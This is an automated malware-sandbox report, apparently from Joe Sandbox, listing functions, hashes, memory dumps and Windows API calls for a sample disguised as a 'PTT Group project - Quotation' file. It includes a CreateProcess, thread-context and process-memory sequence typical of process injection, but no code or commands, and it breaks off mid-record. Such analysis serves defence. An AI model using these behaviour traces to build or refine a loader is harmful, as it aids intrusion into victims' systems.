Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: c0d6abe8a1fb524fde8527acc5249b43286a7f830c88923c3cfff9d2e4fb39e3
Instruction ID: d98fade64c5c28c136f45edbda0a48417ef9bd0046ced0a55a9ad1e9f4437e7c
Opcode Fuzzy Hash: c0d6abe8a1fb524fde8527acc5249b43286a7f830c88923c3cfff9d2e4fb39e3
Instruction Fuzzy Hash: 19F0B471904B059BD721AF79880376FB7A16F85338F568209B824AB1C1CF7C8A019F95

Function 0087129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00871A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00871AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00871B13

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 66b83a414eac5bba9d41a466a03ca363e3057f74271f94cc1d3f3f6abb1ada6c
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: E612BF24E14658C6EB24DF64D8547DEB232FF68300F1090E9910DEB7A5E77A8F81CB5A

Function 00922123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cde0dab3130880a9f7ddedf6b9baba3c86fbf0f840fc5ae3e155899a64f809
Instruction ID: 0eb1731730695c4fc39e8bbe6cde39aa09806819177a5c85affec02fc645a557
Opcode Fuzzy Hash: f9cde0dab3130880a9f7ddedf6b9baba3c86fbf0f840fc5ae3e155899a64f809
Instruction Fuzzy Hash: 70518C35704618EBCF14EF68C9A1FAE77A6AFC5310F158068F856AB392CA34ED44CB41

Function 00915C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00915CF6

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 03f62b4d92f1be789743cbdb36d64f60aa8158e9f742c025458f36d579f16082
Instruction ID: fd80cd736cec434d54415feb4d6172f8ea45436dc5add607cf9c0ff2013d5bb1
Opcode Fuzzy Hash: 03f62b4d92f1be789743cbdb36d64f60aa8158e9f742c025458f36d579f16082
Instruction Fuzzy Hash: C1313B71B00B0AEFCB18DF29D484A9DB7B5FF88310F168629D85993750D771A9A0DBD0

Function 009500D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009500E1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 244d10c896ebe012c61582cef67307229d78a04f7eb3923818e81f3ae541abf4
Instruction ID: 666a43b37655594822950d12bb8571de3a1b6622a0d95b8790724b378acccc7a
Opcode Fuzzy Hash: 244d10c896ebe012c61582cef67307229d78a04f7eb3923818e81f3ae541abf4
Instruction Fuzzy Hash: CC410674608355CFDB24DF14C484B5ABBE1BF85318F19889CE8998B362C336EC85CB52

Function 009179AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009179F9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
Instruction ID: 667d15a9127130e121b94c8097e79f7b59fa7f01413ce23da1df4997c3bbc915
Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
Instruction Fuzzy Hash: 4811D63130920AAFD714DF58C481DAEF7A9EF85324724851AF816DB2A0DB32EC91CBD0

Function 00914F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00914D13: FreeLibrary.KERNEL32(00000000,?), ref: 00914D4D

Part of subcall function 0093548B: __wfsopen.LIBCMT ref: 00935496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00914F6F

Part of subcall function 00914CC8: FreeLibrary.KERNEL32(00000000), ref: 00914D02

Part of subcall function 00914DD0: _memmove.LIBCMT ref: 00914E1A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 404cd7ed3c358ba004ffcabad51ea7c79c96f37166dc4a8c240565fdad1d0427
Instruction ID: 45f8af33f03da87fc48b5c750956ec63b36f9ffe5a75a963fd57a0c2d35f9d90
Opcode Fuzzy Hash: 404cd7ed3c358ba004ffcabad51ea7c79c96f37166dc4a8c240565fdad1d0427
Instruction Fuzzy Hash: D4112332B0020DAACF14AF74DC12FEE73A89FC8710F218829F445A62C1DA759A459BA0

Function 009501AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 009501BB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fd9cd481db2f3f69a892ef52bc9b11179ee8ac1b5362b8b442134adb174296bd
Instruction ID: c1b2bb9be4a9987f69bee768438098261a9e0c11de6d33330988d4ffb8e09a5e
Opcode Fuzzy Hash: fd9cd481db2f3f69a892ef52bc9b11179ee8ac1b5362b8b442134adb174296bd
Instruction Fuzzy Hash: A0212FB4608345DFDB24DF64C484B5ABBE4BF89314F048968E89A87762D731E889CF52

Function 00915D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00915807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00915D76

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d26e63d422d8f0001b20dd28fcc366956ad3039672a9b32d1eeb0c5e949886f0
Instruction ID: 994c3df167d8722888916d28af5680715b0e2dbce4480cb7cce9dbed7ea5baac
Opcode Fuzzy Hash: d26e63d422d8f0001b20dd28fcc366956ad3039672a9b32d1eeb0c5e949886f0
Instruction Fuzzy Hash: E0113D75204B09DFD3308F15E444BA2B7F9EF85750F12C92EE4AA86690D770E985CF60

Function 00934A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00934AD6

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 64c025458105560d4fa2a8b8c6fb20dbd2a20e5b153961c50dda12f076d72ee4
Instruction ID: 28067491a5a53b4d4086555bd9b2d84485461e3ae5e18613d8158f5e5648d7fc
Opcode Fuzzy Hash: 64c025458105560d4fa2a8b8c6fb20dbd2a20e5b153961c50dda12f076d72ee4
Instruction Fuzzy Hash: CAF0C231940309ABDF61AF74CC067AF77A9AF80325F068514F424EA1D1CB789E51DF51

Function 00914FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,009D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00914FDE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a8eeb2ef00327cd6a3c37f21f797ecf653d1aa73bdef8c3b47d4b808010b7138
Instruction ID: 65e76e5d306fe3becd925690bd7685cd664831434abd7aa1fec972d138f7ea2f
Opcode Fuzzy Hash: a8eeb2ef00327cd6a3c37f21f797ecf653d1aa73bdef8c3b47d4b808010b7138
Instruction Fuzzy Hash: A0F0397120971ACFCB349F64E894892BBE5BF083293208A3EE1D682710C731A895DF40

Function 009309D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009309F4

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: e62fb95713e5af75771960dc31c6eb6d4e6daefe7f48e47ea08f80eb57a811bc
Instruction ID: b21b67023275eda218c1477d288798c9d5f54b2b8fc18616f1f297bb43d13689
Opcode Fuzzy Hash: e62fb95713e5af75771960dc31c6eb6d4e6daefe7f48e47ea08f80eb57a811bc
Instruction Fuzzy Hash: B9E08636A0422C57C720D6989C05FFAB7ADDFC8790F0401B6FC0CD7248E9609C818690

Function 00979129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0097914B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 4d79c6002b72961f47a10066791cdd268ab66379f86e6efc8079aee1197e1221
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 3FE09AB1208B009FDB388A24D811BE373E4EB0A315F00081CF2AAC3342EB62B8418B59

Function 00915DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0094E16B,?,?,00000000), ref: 00915DBF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 118a79446a5e4de516e354f42508dabed33b721a4249b0496c435f6b19e6fb28
Instruction ID: 9bef4f432eb16cafac6efbbcea45bfff3dd6d6d222bd4c1a1de17568120517eb
Opcode Fuzzy Hash: 118a79446a5e4de516e354f42508dabed33b721a4249b0496c435f6b19e6fb28
Instruction Fuzzy Hash: C0D0C77465420CBFE710DB84DC46FA9B77CD705710F100195FD0496690D6B27D509795

Function 0093548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00935496

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 1e1e5e8cb836261e6b498a9c5324f63fb706640192838607ed2bb5a4778e7055
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 8AB0927684020C77DE012E82EC02B593B199B84678F808020FB0C18172A673A6A09A8A

Function 0097D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0097D46A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: add56ea8321d0ff62035444fc786ae23813e8cf15487c29089c77bffab43fb47
Instruction ID: 82032649f56f2fe11b190b75156f138f5346685e7c8d7c7e65fbe16ea7c731a0
Opcode Fuzzy Hash: add56ea8321d0ff62035444fc786ae23813e8cf15487c29089c77bffab43fb47
Instruction Fuzzy Hash: 257162312053068FC714EF24C491BAAB7F5AFC8714F05496DF49A9B2A1DB30ED49CB52

Function 00930E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00930EF7

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 94fa24aea02c89fc903283b304360b15ed237019986e06d38979607f10bf1339
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3531B175A00105DBC728DF58D4A0969F7AAFF99300F688AA5E40ACB655DB35EDC1CF80

Function 0087229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 008722B1

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: cec2c168829e7b60d0f2dfda15536f34f39bfda0266330a08456278774347a78
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 48E0BF7494010EEFDB00EFA4D5496DE7BB4FF04311F1045A1FD05D7691DB309E548A62

Function 008722A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 008722B1

Memory Dump Source

Source File: 00000000.00000002.1649357424.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_PTT Group project - Quotation.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 919302eb003a8673e9d571833c55c3501d3f9a79423681813965d35ff9936035
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D0E0E67494010EDFDB00EFB4D54969E7FB4FF04301F104161FD05D2281D6309D508A72

Non-executed Functions

Function 0099CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0099CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0099CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0099CF00
SendMessageW.USER32 ref: 0099CF29
_wcsncpy.LIBCMT ref: 0099CFA1
GetKeyState.USER32(00000011), ref: 0099CFC2
GetKeyState.USER32(00000009), ref: 0099CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099CFE5
GetKeyState.USER32(00000010), ref: 0099CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0099D018
SendMessageW.USER32 ref: 0099D03F
SendMessageW.USER32(?,00001030,?,0099B602), ref: 0099D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0099D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0099D16E
SetCapture.USER32(?), ref: 0099D177
ClientToScreen.USER32(?,?), ref: 0099D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0099D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0099D203
ReleaseCapture.USER32 ref: 0099D20E
GetCursorPos.USER32(?), ref: 0099D248
ScreenToClient.USER32(?,?), ref: 0099D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0099D2B1
SendMessageW.USER32 ref: 0099D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0099D31C
SendMessageW.USER32 ref: 0099D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0099D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0099D37B
GetCursorPos.USER32(?), ref: 0099D39B
ScreenToClient.USER32(?,?), ref: 0099D3A8
GetParent.USER32(?), ref: 0099D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0099D431
SendMessageW.USER32 ref: 0099D462
ClientToScreen.USER32(?,?), ref: 0099D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0099D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0099D51A
SendMessageW.USER32 ref: 0099D53D
ClientToScreen.USER32(?,?), ref: 0099D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0099D5C3

Part of subcall function 009125DB: GetWindowLongW.USER32(?,000000EB), ref: 009125EC

GetWindowLongW.USER32(?,000000F0), ref: 0099D65F

Strings

F, xrefs: 0099D543
@GUI_DRAGID, xrefs: 0099D1AA

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 82f517a805475c5c38a8ba38aa0f99409970e3f606eb88192f03710565ea1c2b
Instruction ID: be9d1ff309944f79dd729cd4e658f9275d5e32cd2239f8a5cc5a4dff5a3e39b9
Opcode Fuzzy Hash: 82f517a805475c5c38a8ba38aa0f99409970e3f606eb88192f03710565ea1c2b
Instruction Fuzzy Hash: 86429E70209345AFDB25CF6CCC94BAABBEAFF49314F14051AF65A872A0C7319C50DB92

Function 0099804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0099873F

Strings

%d/%02d/%02d, xrefs: 00998478

Memory Dump Source

